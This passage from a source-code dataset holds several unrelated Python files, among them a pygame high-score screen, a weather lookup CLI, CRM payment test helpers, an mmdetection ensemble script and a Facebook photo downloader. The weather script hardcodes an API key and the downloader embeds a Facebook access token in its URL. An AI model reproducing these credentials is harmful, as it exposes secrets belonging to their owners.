_keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n\n def update(self, screen, dt):\n self.ticks += dt\n\n screen.fill(BLACK)\n \n create_draw_text(screen, SPACE2, 64, 'GAME OVER', WHITE, position='center')\n \n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to Main Menu', WHITE, position='bottomcenter')\n \n pg.display.flip()\n\nclass NewRecord(Scene):\n '''\n Class who draws the NewRecord scene\n '''\n\n def __init__(self, score):\n Scene.__init__(self)\n self.bg_sound = NEW_RECORD_SOUND\n self.bg_sound.set_volume(DEFAULT_VOL)\n self.bg_sound.play()\n\n n = [x for x in range(1,27)]\n l = [x for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']\n self.options = dict(zip(n, l)) \n\n self.sel_option = 1\n self.l = [] # For store the letters we put in NewRecord\n\n self.record = score\n self.recorded = False\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_UP and self.sel_option > 1:\n self.sel_option -= 1\n OPTION_SOUND.play()\n if event.key == pg.K_DOWN and self.sel_option < 26:\n self.sel_option += 1\n OPTION_SOUND.play()\n if event.key == pg.K_SPACE: \n if len(self.l) != 3:\n self.l.append(self.options[self.sel_option])\n self.sel_option = 1\n else:\n if not self.recorded:\n name = ''.join(self.l)\n # Inserting new record\n BBDD().insert_new_record((self.record, name))\n self.recorded = True\n else:\n self.switchToScene(TitleScene())\n self.bg_sound.stop()\n SELECTED_SOUND.play()\n\n\n def update(self, screen, dt):\n self.ticks += dt\n\n screen.fill(BLACK)\n\n create_draw_text(screen, SPACE2, 54, 'NEW RECORD!', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 42, 'SCORE :', WHITE, pos_x=220, pos_y=220)\n create_draw_text(screen, SPACE2, 42, str(self.record), WHITE, pos_x=400, pos_y=220)\n create_draw_text(screen, SPACE2, 32, 'INSERT YOUR NAME HERE :', WHITE, pos_x=180, pos_y=320)\n\n self._draw_name(screen)\n\n pg.display.flip()\n\n def _draw_name(self, screen):\n \n x = 590 # x position for letters\n\n if not self.l: # No letters yet\n create_draw_text(screen, SPACE2, 26, self.options[self.sel_option], WHITE, pos_x=x, pos_y=325)\n\n else: # if letters writted\n for element in self.l:\n create_draw_text(screen, SPACE2, 26, element, WHITE, pos_x=x, pos_y=325)\n x += 30\n\n if len(self.l) < 3: # Not all letters writted\n create_draw_text(screen, SPACE2, 26, self.options[self.sel_option], WHITE, pos_x=x, pos_y=325)\n\n else: # All letters writted\n\n if not self.recorded: # Record no saved yet\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to enter your record', WHITE, position='bottomcenter')\n\n else: # Record saved\n create_draw_text(screen, SPACE2, 26, 'RECORD ADDED SUCCESFULLY!', RED, pos_x=200, pos_y=400)\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to go to main menu', WHITE, position='bottomcenter')\n\nclass NoRecord(Scene):\n '''\n Class who draws the NoRecord scene\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n create_draw_text(screen, SPACE2, 54, 'NO RECORD HAS BEEN BEATED', WHITE, position='topcenter')\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to go to main menu', WHITE, position='bottomcenter')\n\n pg.display.flip()","sub_path":"the_quest/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":23281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511201029","text":"''' MatchingRules Module '''\nfrom modules.parser.models import (ChildMetadataType, CompoundMetadataType,\n MetadataType, get_child_objects)\n\n\nclass MatchingRule(CompoundMetadataType):\n ''' Custom Label Child Metadata Implementation '''\n TAG_NAME = 'matchingRules'\n PACKAGE_NAME = 'MatchingRule'\n ID_ATTRIBUTE = 'fullName'\n\n def __hash__(self):\n return hash(str(self))\n\n class MatchingRuleItem(ChildMetadataType):\n ''' Rule Entry - Assigment Rule implementation '''\n TAG_NAME = 'matchingRuleItems'\n ID_ATTRIBUTE = 'fieldName'\n\n CHILD_OBJECTS = {'matchingRuleItems': MatchingRuleItem}\n\n\nclass MatchingRules(MetadataType):\n ''' Custom Labels Metadata Implementation '''\n TAG_NAME = 'MatchingRules'\n PACKAGE_NAME = 'MatchingRules'\n CHILD_OBJECTS = get_child_objects(__name__)\n FOLDER_NAME = 'matchingRules'\n EXTENSION_NAME = 'matchingRule'\n CHILD_SEPARATOR = '.'\n","sub_path":"merger/modules/parser/models/matching_rules.py","file_name":"matching_rules.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62645369","text":"\r\n# Import requests json and time to use throughout the pogram.\r\nimport requests\r\nimport json\r\nimport time\r\n\r\nprint(\"Program starting...\")\r\ntime.sleep(0.5)\r\n\r\nprint(\"\"\"\r\n****WELCOME TO THE WEATHER PROGRAM***\r\n\"\"\")\r\n\r\ntime.sleep(0.5)\r\n# Use a function to get the data for our weather program.\r\ndef weather_data(base_url, api_key):\r\n \r\n city_name = input(\"Enter city name: \")\r\n # If statement to make sure the user only entered letters when entering a city..\r\n if city_name.replace(\" \", \"\").isalpha() == False:\r\n print(\"Please enter valid city name: \")\r\n time.sleep(0.5)\r\n print(\"Please try again, with letters only.\")\r\n city_name = input(\"Enter city name: \")\r\n\r\n zip_code = input(\"Enter zip code: \")\r\n # If statement to make sure the user only entered numbers when entering a zip code.\r\n if zip_code.isdigit() == False:\r\n print(\"Please enter a valid zip code.\")\r\n time.sleep(0.5)\r\n print(\"Please try again, with numbers only.\")\r\n zip_code = input(\"Enter zip code: \")\r\n # Elif statement to make sure the zip code the user entered is exactly 5 digits. \r\n elif len(zip_code) != 5:\r\n print(\"Please enter exactly 5 digits for zip code.\")\r\n time.sleep(0.5)\r\n zip_code = input(\"Enter zip code: \")\r\n \r\n quit = False\r\n # While loop to loop through the program until the user wants to stop.\r\n while quit == False:\r\n # Try block to try out the data and check if it works.\r\n try:\r\n complete_url = base_url + city_name + ','+ zip_code + \"&appid=\" + api_key\r\n # Use requests to get data from the website.\r\n response = requests.get(complete_url)\r\n # Use json to make the data readable to the user.\r\n w_data = response.json()\r\n\r\n description = w_data['weather'][0]['description']\r\n humidity = w_data['main']['humidity']\r\n wind = w_data['wind']['speed']\r\n # We convert kelvin to fahrenheit.\r\n temp = (w_data['main']['temp'] - 273.15) * (9/5) + 32\r\n temp_min = (w_data['main']['temp_min'] - 273.15) * (9/5) + 32\r\n temp_max = (w_data['main']['temp_max'] - 273.15) * (9/5) + 32\r\n feels_like = (w_data['main']['feels_like'] - 273.15) * (9/5) + 32\r\n\r\n print(\"\\n\")\r\n print(\"Loading your weather data...\\n\")\r\n\r\n time.sleep(.75)\r\n\r\n print(\"---------------------------\")\r\n print(\"Today's Forecast for {}\".format(city_name))\r\n print(\"---------------------------\\n\")\r\n print(\"Day:\\t\\t{}\".format(description))\r\n print(\"Temp now:\\t{}\".format(round(temp,1)))\r\n print(\"Humidity:\\t{}\".format(humidity))\r\n print(\"Temp low:\\t{}\".format(round(temp_min,1)))\r\n print(\"Temp high:\\t{}\".format(round(temp_max,1)))\r\n print(\"Wind:\\t\\t{}mph\".format(wind))\r\n print(\"Feels like:\\t{}\".format(round(feels_like,1)))\r\n # Except key to send back a message to the user if a key error was found.\r\n except KeyError:\r\n print('Sorry. The weather data was not found for the info you entered.')\r\n # Except key to send a message back to to the user if any other error happens.\r\n except Exception:\r\n print('Sorry. Something went wrong.')\r\n \r\n user_input = input(\"Would you like to try again? (Y|N) \")\r\n # If statement to loop through the program again if the user enters \"Y\" and wants to find weather data another time.\r\n if user_input.upper() == 'Y':\r\n city_name = input(\"Enter city: \")\r\n # If statement to make sure the user only entered letters when entering a city..\r\n if city_name.replace(\" \", \"\").isalpha() == False:\r\n print(\"Please enter valid city name: \")\r\n time.sleep(0.5)\r\n print(\"Please try again, with letters only.\")\r\n city_name = input(\"Enter city name: \")\r\n\r\n zip_code = input(\"Enter zip code: \")\r\n # If statement to make sure the user only entered numbers when entering a zip code.\r\n if zip_code.isdigit() == False:\r\n print(\"Please enter a valid zip code.\")\r\n time.sleep(0.5)\r\n print(\"Please try again, with numbers only.\")\r\n zip_code = input(\"Enter zip code: \")\r\n # Elif statement to make sure the zip code the user entered is exactly 5 digits. \r\n elif len(zip_code) != 5:\r\n print(\"Please enter exactly 5 digits for zip code.\")\r\n time.sleep(0.5)\r\n zip_code = input(\"Enter zip code: \")\r\n # Elif statemet to end the program if the user enters \"N\" and wants to quit.\r\n\r\n elif user_input.upper() == 'N':\r\n print(\"Program exiting...\")\r\n time.sleep(.75)\r\n print(\"See you next time!\")\r\n quit = True\r\n # Else statement to tell the user the entered an invalid input if they don't enter \"Y\" or \"N\". \r\n else:\r\n print(\"Invalid input\")\r\n city_name = input(\"Enter city: \")\r\n zip_code = input(\"Enter zip code: \")\r\n\r\n\r\n# Use a main fuction to execute the weather_data function.\r\ndef main():\r\n api_key = '55592219da64379c5a1872dccb250590'\r\n base_url = 'http://api.openweathermap.org/data/2.5/weather?q='\r\n\r\n weather_data(base_url, api_key)\r\n\r\n\r\n# If statement to make sure we are on the main terminal.\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Yitzchok Shear Final Program.py","file_name":"Yitzchok Shear Final Program.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653650895","text":"# -*- coding: utf-8 -*-\n__author__ = 'Jun'\n\nfrom bs4 import BeautifulSoup\nimport json\nimport requests\nimport random\nimport datetime\n# import MySQLdb\nimport re\nimport sys\nfrom decimal import Decimal as D\nfrom commons import common\nfrom commons.const import const\nfrom testCase.users import testGetUser as users\nfrom testCase.departments import testGetDepartment as departmentid\nfrom testCase.customers.testAddCustomer import AddCustomer\nfrom testCase.contracts.testAddContract import AddContract\n\n\nclass AddReceivedPayment:\n def __init__(self, cookie, csrf):\n self.common = common.Common(cookie, csrf)\n self.base_url = const.BASE_URL\n self.csrf = csrf\n self.cookie = cookie\n self.response = ''\n self.user_id = ''\n self.customers_id = []\n self.params = ''\n self.user = users.GetUser(cookie, csrf)\n self.DepartmentId = departmentid.GetDepartment(cookie, csrf)\n self.testAddCustomer = AddCustomer(cookie, csrf)\n self.testAddContract = AddContract(cookie, csrf)\n self.customer_id = ''\n self.contract_id = ''\n pass\n\n\n\n # 新增回款计划\n def add_received_payment_plans(self):\n url = self.base_url +'api/received_payments'\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'plans[0][customer_id]': self.testAddCustomer.add_customers(),\n 'plans[0][contract_id]': self.testAddContract.add_contracts(),\n 'plans[0][receive_stage]': '1',\n 'plans[0][receive_date]': '2018-08-01',\n 'plans[0][amount]': '4500',\n 'plans[0][note]':''\n\n }\n response = self.common.post_response_json(url, body, '新增回款计划 api是' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n #获取回款计划id\n def received_payment_plan_id_get(self, contract_id,):\n url = self.base_url +'contracts/%s?tab=tab_received_payments' %contract_id\n body ={}\n response = self.common.get_response_json(url, body, '获取回款计划id api是' + url)\n self.response = response\n S = self.response.text\n soup = BeautifulSoup(S, 'html.parser')\n received_payment_plan_id = re.findall(r\"received_payment_plan_id: (.*?),\", str(soup))\n return received_payment_plan_id\n\n # 获取回款计划id按照回款页面\n def received_payment_plan_id_get_page(self):\n url = self.base_url + 'received_payment_center/received_payment_plans?scope=received_payment_plans&per_page=10&type=advance§ion_only=true'\n body = {}\n response = self.common.get_response_json(url, body, '获取回款计划id api是' + url)\n self.response = response\n S = self.response.text\n soup = BeautifulSoup(S, 'html.parser')\n # print (str(soup))\n received_payment_plan_id = re.findall(r\"data-id=\\\"(.*?)\\\">\", str(soup))\n return received_payment_plan_id\n\n # 新增回款记录\n def add_received_payments(self, contract_id,receive_date ='2018-06-22',amount ='2000',customer_id =''):\n url = self.base_url +'api/received_payments'\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'request_ticket': self.common.get_random_int(9999999999999),\n 'contract_id': contract_id,\n 'received_payment[receive_date]': receive_date,\n 'received_payment[amount]': amount,\n 'received_payment[customer_id]': customer_id,\n 'received_payment[contract_id]': contract_id,\n 'received_payment[received_payment_plan_id]': self.received_payment_plan_id_get_page()[0],\n 'received_payment[payment_type]': '',\n 'received_payment[received_types]': '',\n 'received_payment[receive_user_id]': self.user.getMyUserId(),\n 'received_payment[note]': '备注',\n }\n response = self.common.post_response_json(url, body, '新增回款记录 api是' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n # 新增开票记录\n def add_invoiced_payments(self, contract_id):\n url = self.base_url + 'api/invoiced_payments'\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'invoiced_payment[amount]': '2000',\n 'invoiced_payment[invoice_types]': '205671',\n 'invoiced_payment[invoice_no]': '',\n 'invoiced_payment[note]': '备注',\n 'invoiced_payment[invoiced_date]': '2018-06-23',\n 'invoiced_payment[broker_user_id]': self.user_id,\n 'invoiced_payment[content]': '开票' % self.common.get_random_int(99999),\n }\n response = self.common.post_response_json(url, body, '新增开票记录 api是' + url)\n if not response:\n return {}\n self.response = response\n invoiced_payment_id = self.response.json()['data']['id']\n return invoiced_payment_id","sub_path":"testCase/received_payment_center/testAddReceivedPayments.py","file_name":"testAddReceivedPayments.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418221618","text":"import time\n\nfrom ActionsPage import ActionsPage\nfrom EditAxis import EditAxis\n\nfrom selenium.common.exceptions import NoSuchElementException\n\n\nclass EditAxisPopUp(ActionsPage):\n\n def __init__(self, driver, server):\n super(EditAxisPopUp, self).__init__(driver, server)\n self.edit_axis = EditAxis(driver, None)\n\n def _validate_page(self):\n edit_axis_locator = \"//div[@class='modal-header']/h5[contains(text(), 'Edit')]\"\n print(\"...EditAxisPopUp.validate_page()...\")\n try:\n self.find_element_by_xpath(edit_axis_locator, \"'Edit' header\")\n except NoSuchElementException as e:\n print(\"Not finding 'Edit Axis' pop up\")\n raise e\n\n def adjust_var_axes_slider(self, var, axis_title, min_offset_percent, max_offset_percent):\n self.edit_axis.adjust_var_axes_slider(var, axis_title,\n min_offset_percent, max_offset_percent)\n\n def click_on_update(self):\n print(\"...click on 'Update' button on the 'Edit Axis' pop up\")\n update_class = \"varmini-update-btn-vcdat\"\n try:\n update_button = self.find_element_by_class(update_class,\n \"'Update' button on 'Edit Axis' pop up\")\n self.move_to_click(update_button)\n time.sleep(self._delay)\n except NoSuchElementException as e:\n print(\"FAIL...EditAxisPopUp.click_on_update\")\n raise e\n","sub_path":"tests/PageObjects/EditAxisPopUp.py","file_name":"EditAxisPopUp.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62874137","text":"import time, argparse\nfrom tqdm import tqdm\nimport os, cv2\nimport json\nimport mmcv\nimport glob \nimport torch\nfrom mmdet.datasets import (build_dataloader, build_dataset,\n replace_ImageToTensor)\nfrom mmdet.models import build_detector\nfrom mmcv.runner import wrap_fp16_model, load_checkpoint\nfrom mmcv.cnn import fuse_conv_bn\nfrom mmcv import Config\nfrom mmcv.parallel import MMDataParallel\nfrom ensemble_boxes import *\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='json2submit_nms')\n parser.add_argument('--jsonfile', default='bbox-val.json', help='submit_file_name', type=str)\n args = parser.parse_args()\n return args\n\nunderwater_classes = ['Crack', 'Manhole', 'Net', 'Pothole', 'Patch-Crack', 'Patch-Net',\n 'Patch-Pothole', 'other']\n\ndef post_predictions(predictions, img_shape):\n bboxes_list, scores_list, labels_list = [], [], []\n for i, bboxes in enumerate(predictions):\n if len(bboxes) > 0:\n detect_label = i\n for bbox in bboxes:\n xmin, ymin, xmax, ymax, score = bbox.tolist()\n\n xmin /= img_shape[1]\n ymin /= img_shape[0]\n xmax /= img_shape[1]\n ymax /= img_shape[0]\n bboxes_list.append([xmin, ymin, xmax, ymax])\n scores_list.append(score)\n labels_list.append(detect_label)\n\n return bboxes_list, scores_list, labels_list\n \ndef main():\n args = parse_args()\n config_file1 = './ensemble_configs/cascade_rcnn_r50_rfp_carafe_sac.py' # detectors_r50\n checkpoint_file1 = './ensemble_configs/cas-0bd921e5.pth' \n config_file2 = './ensemble_configs/cascade_rcnn_s101_dcn_fpn.py' # s101\n checkpoint_file2 = './ensemble_configs/s101_20-bd7b757b.pth'\n config_file3 = './ensemble_configs/cascade_rcnn_r2_101_dcn_fpn.py' # r2_101\n checkpoint_file3 = './ensemble_configs/r2_101_20-487bd3ea.pth'\n config_file4 = './ensemble_configs/cascade_rcnn_r101_dcn_fpn.py' # r101\n checkpoint_file4 = './ensemble_configs/r101_20-db83ab64.pth'\n config_file5 = './ensemble_configs/cascade_rcnn_x101_32x4d_dcn_fpn.py' # x101_32x4d\n checkpoint_file5 = './ensemble_configs/x101_32x4d_20-f11fb360.pth'\n config_file6 = './ensemble_configs/cascade_rcnn_swin_small_fpn.py' # swin_small\n checkpoint_file6 = './ensemble_configs/swin_small_e20-0df8a664.pth'\n \n device = 'cuda:0'\n cfg1 = Config.fromfile(config_file1)\n cfg2 = Config.fromfile(config_file2)\n cfg3 = Config.fromfile(config_file3)\n cfg4 = Config.fromfile(config_file4)\n cfg5 = Config.fromfile(config_file5)\n cfg6 = Config.fromfile(config_file6)\n \n # build model\n # model1\n model1 = build_detector(cfg1.model, test_cfg=cfg1.get('test_cfg'))\n load_checkpoint(model1, checkpoint_file1, map_location=device)\n # model2\n model2 = build_detector(cfg2.model, test_cfg=cfg2.get('test_cfg'))\n load_checkpoint(model2, checkpoint_file2, map_location=device)\n # model3\n model3 = build_detector(cfg3.model, test_cfg=cfg3.get('test_cfg'))\n load_checkpoint(model3, checkpoint_file3, map_location=device)\n # model4\n model4 = build_detector(cfg4.model, test_cfg=cfg4.get('test_cfg'))\n load_checkpoint(model4, checkpoint_file4, map_location=device)\n # model5\n model5 = build_detector(cfg5.model, test_cfg=cfg5.get('test_cfg'))\n load_checkpoint(model5, checkpoint_file5, map_location=device)\n # model6\n model6 = build_detector(cfg6.model, test_cfg=cfg6.get('test_cfg'))\n load_checkpoint(model6, checkpoint_file6, map_location=device)\n \n test_json_raw = json.load(open(cfg1.data.test.ann_file))\n imgid2name = {}\n for imageinfo in test_json_raw['images']:\n imgid = imageinfo['id']\n imgid2name[imageinfo['file_name']] = imgid\n wrap_fp16_model(model1) # 采用fp16加速预测\n wrap_fp16_model(model2)\n wrap_fp16_model(model3)\n wrap_fp16_model(model4)\n wrap_fp16_model(model5)\n wrap_fp16_model(model6)\n \n # build the dataloader\n samples_per_gpu = cfg1.data.test.pop('samples_per_gpu', 1) # aug_test不支持batch_size>1\n dataset = build_dataset(cfg1.data.test)\n data_loader = build_dataloader(\n dataset,\n samples_per_gpu=samples_per_gpu,\n workers_per_gpu=4,\n dist=False,\n shuffle=False)\n model1 = MMDataParallel(model1, device_ids=[0]) # 为啥加?(不加就错了)\n model2 = MMDataParallel(model2, device_ids=[0])\n model3 = MMDataParallel(model3, device_ids=[0])\n model4 = MMDataParallel(model4, device_ids=[0])\n model5 = MMDataParallel(model5, device_ids=[0])\n model6 = MMDataParallel(model6, device_ids=[0])\n model1.eval()\n model2.eval()\n model3.eval()\n model4.eval()\n model5.eval()\n model6.eval()\n \n json_results = []\n dataset = data_loader.dataset\n prog_bar = mmcv.ProgressBar(len(dataset))\n for i, data in enumerate(data_loader):\n with torch.no_grad():\n result1 = model1(return_loss=False, rescale=True, **data)\n result2 = model2(return_loss=False, rescale=True, **data)\n result3 = model3(return_loss=False, rescale=True, **data)\n result4 = model4(return_loss=False, rescale=True, **data)\n result5 = model5(return_loss=False, rescale=True, **data)\n result6 = model6(return_loss=False, rescale=True, **data)\n batch_size = len(result1)\n assert len(result1) == len(result2)\n \n result1 = result1[0] # 每次只输入一张\n result2 = result2[0]\n result3 = result3[0]\n result4 = result4[0]\n result5 = result5[0]\n result6 = result6[0]\n img_metas = data['img_metas'][0].data[0]\n img_shape = img_metas[0]['ori_shape']\n bboxes, scores, labels = post_predictions(result1, img_shape)\n e_bboxes, e_scores, e_labels = post_predictions(result2, img_shape)\n e_bboxes3, e_scores3, e_labels3 = post_predictions(result3, img_shape)\n e_bboxes4, e_scores4, e_labels4 = post_predictions(result4, img_shape)\n e_bboxes5, e_scores5, e_labels5 = post_predictions(result5, img_shape)\n e_bboxes6, e_scores6, e_labels6 = post_predictions(result6, img_shape)\n bboxes_list = [bboxes, e_bboxes, e_bboxes3, e_bboxes4, e_bboxes5, e_bboxes6]\n scores_list = [scores, e_scores, e_scores3, e_scores4, e_scores5, e_scores6]\n labels_list = [labels, e_labels, e_labels3, e_labels4, e_labels5, e_labels6]\n bboxes, scores, labels = weighted_boxes_fusion(\n bboxes_list,\n scores_list,\n labels_list,\n weights=[1.5, 1, 1, 1, 1, 1],\n iou_thr=0.6,\n skip_box_thr=0.0001,\n conf_type='avg')\n# basename = img_metas[0]['ori_filename']\n# image = cv2.imread(os.path.join(cfg1.data.test.img_prefix, basename))\n for (box, score, label) in zip(bboxes, scores, labels):\n xmin, ymin, xmax, ymax = box.tolist()\n xmin, ymin, xmax, ymax = round(\n float(xmin) * img_shape[1],\n 2), round(float(ymin) * img_shape[0],\n 2), round(float(xmax) * img_shape[1],\n 2), round(float(ymax) * img_shape[0], 2)\n data = dict()\n data['image_id'] = imgid2name[img_metas[0]['ori_filename']]\n data['bbox'] = [xmin, ymin, xmax-xmin, ymax-ymin]\n data['score'] = float(score)\n data['category_id'] = label+1\n json_results.append(data)\n# if score >= 0.1:\n# cv2.rectangle(image, (int(xmin), int(ymin)), (int(xmax), int(ymax)), (255, 255, 0), 2)\n# cv2.putText(image, underwater_classes[int(label)] + ' ' + str(round(score, 5)),\n# (int(xmin), int(ymin - 2)),\n# cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0), thickness=2\n# )\n# cv2.imwrite(os.path.join('val_img', basename), image)\n for _ in range(batch_size):\n prog_bar.update()\n mmcv.dump(json_results, args.jsonfile)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"code/tools/post_process/test_ensemble.py","file_name":"test_ensemble.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584638785","text":"import requests\n\n\nr = requests.get(\n 'https://graph.facebook.com/123103684386135/posts?access_token=CAADVtJqGBj8BALYd0MZCzc2WshZAFFrmyhUxA8HZAkzwZBfVlBtE6U8jOpApLs0vW04Ss2qL3tK81K5JewgsiExZAExB3FlUPDizR3U5CZBlZCpZBYptVKqsmScEktw82bZAfUaj2kgSZB9CZAsgEBFr8rttZBDFdOzXaeYKumQsk2AUI8h9HeAuaIPMgJXLLSJdXbIZAVuEXq23gMedeTr72p0SOZCFBCteLZCRUeexcZAH1gCEIAZDZD'\n)\n\nn = 0\n\nfor i, post in enumerate(r.json().get('data')):\n if post.get('type') == 'photo':\n r2 = requests.get(post.get('picture').replace('_s', '_a'))\n with open('images/photo{}.jpg'.format(n), 'wb') as f:\n f.write(r2.content)\n n += 1\n\n if n >= 6:\n break\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312658230","text":"import numpy as np\r\nimport csv\r\nwith open(\"C:\\\\Users\\\\Sahil\\\\Downloads\\\\terrorismData.csv\" , encoding ='UTF-8') as file_obj:\r\n # csv_obj=csv.reader(file_obj)\r\n csv_obj = csv.DictReader(file_obj,skipinitialspace=True)\r\n # list1=list(csv_obj)\r\n\r\n killed=list()\r\n for row in csv_obj:\r\n if row['Country']=='United States':\r\n killed.append(row['Killed'])\r\n\r\n np_killed=np.array(killed)\r\n np_killed[np_killed=='']='0.0'\r\n np_killed=np.array(np_killed , dtype=float)\r\n print(int(np.sum(np_killed)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Jupyter_notebook/numpy/totak_killed_in_usa.py","file_name":"totak_killed_in_usa.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632945265","text":"import math\n\nf_in = open('C-large-1.in', 'r')\nf_out = open('C-large-1.out', 'w')\n\nnum_cases = int(f_in.readline().strip())\n\nfor idx_case in range(num_cases):\n A_B_list = f_in.readline().strip().split()\n num_digits_A = len(A_B_list[0])\n num_digits_B = len(A_B_list[1])\n A = int(A_B_list[0])\n B = int(A_B_list[1])\n \n num_fair_and_square = 0\n \n # n is the smaller palindrome, n_sq is the larger palindrome\n for num_digits_n in range((num_digits_A + 1) / 2, (num_digits_B + 3) / 2):\n num_digits_m = (num_digits_n + 1) / 2\n for m in range(10 ** (num_digits_m - 1), 10 ** num_digits_m):\n if num_digits_n % 2 == 0:\n n = int(str(m) + str(m)[::-1])\n else:\n n = int(str(m) + str(m)[-2::-1])\n n_sq = n * n\n if n_sq >= A and n_sq <= B and str(n_sq) == str(n_sq)[::-1]:\n num_fair_and_square += 1\n \n f_out.write('Case #{}: {}\\n'.format(idx_case+1, num_fair_and_square))\n\nf_in.close()\nf_out.close()","sub_path":"solutions_2463486_1/Python/UgglyNoodle/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504805940","text":"from turtle_forward_dfa import ForwardDataflowAnalysis\n\nclass Dominators(ForwardDataflowAnalysis):\n def universal(self, node):\n if node.prev:\n return set((n.idx for n in self.cfg))\n else:\n return set([node.idx])\n\n def conf(self, a, b):\n return set.intersection(a,b)\n\n def gen(self, node):\n return set([node.idx])\n\n def kill(self, node):\n return set()\n\ndef get_idoms(cfg, doms):\n idoms = {}\n\n for node in cfg:\n visited = set()\n q = [node]\n while len(q) > 0:\n curr = q.pop()\n\n if curr.idx not in visited:\n visited.add(curr.idx)\n\n if curr.idx in doms[node] and curr.idx != node.idx:\n idoms[node] = curr\n break\n else:\n q = curr.prev + q\n\n return idoms\n\ndef get_df(cfg, idom):\n df = {}\n\n for node in cfg:\n df[node.idx] = set()\n\n for node in cfg:\n if len(node.prev) > 1:\n for pred in node.prev:\n runner = pred\n while runner != idom[node]:\n df[runner.idx].add(node.idx)\n runner = idom[runner]\n\n return df\n","sub_path":"compiler/turtle_dominator.py","file_name":"turtle_dominator.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420887549","text":"import os.path\nimport os\nimport requests\nimport sys\nimport sqlite3 as sql\nimport datetime\nimport json\nimport socket\nimport hashlib\nfrom models import image_model\nfrom PIL import Image\n\ndef compute_average_image_color(img):\n width, height = img.size\n\n r_total = 0\n g_total = 0\n b_total = 0\n\n count = 0\n for x in range(0, width):\n for y in range(0, height):\n r, g, b = img.getpixel((x,y))\n r_total += r\n g_total += g\n b_total += b\n count += 1\n\n return (r_total/count, g_total/count, b_total/count)\n\n# OBJECTS DATABASE OPERATIONS\ndef all_objects_name():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT id,class,confidence from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"confidence\" : obj[2]\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected():\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected_name(name):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n if(obj[1].lower() == name.lower()):\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : obj[2],\n \"image\" : obj[3],\n \"confidence\" : obj[4],\n \"original\" : obj[5],\n }\n )\n return json.dumps(json_result)\n\ndef all_objects_detected_name_color(name, color):\n con = sql.connect(\"database.db\")\n db = con.cursor()\n statement = \"SELECT * from objects ORDER BY id DESC\"\n db.execute(str(statement))\n result = db.fetchall()\n json_result = []\n for obj in result:\n if(obj[1].lower() == name.lower()):\n obj_img = Image.open('resources/images/objs/' + obj[2])\n avarage_colors = compute_average_image_color(obj_img)\n dominant_color_value = max(avarage_colors)\n\n for i in range (0, len(avarage_colors)):\n if dominant_color_value == avarage_colors[i]:\n if i == 0:\n dominant_color_name = 'red'\n elif i == 1:\n dominant_color_name = 'green'\n else:\n dominant_color_name = 'blue'\n \n if color.lower() == dominant_color_name:\n json_result.append(\n {\n \"id\" : obj[0], \n \"class\" : obj[1],\n \"name\" : 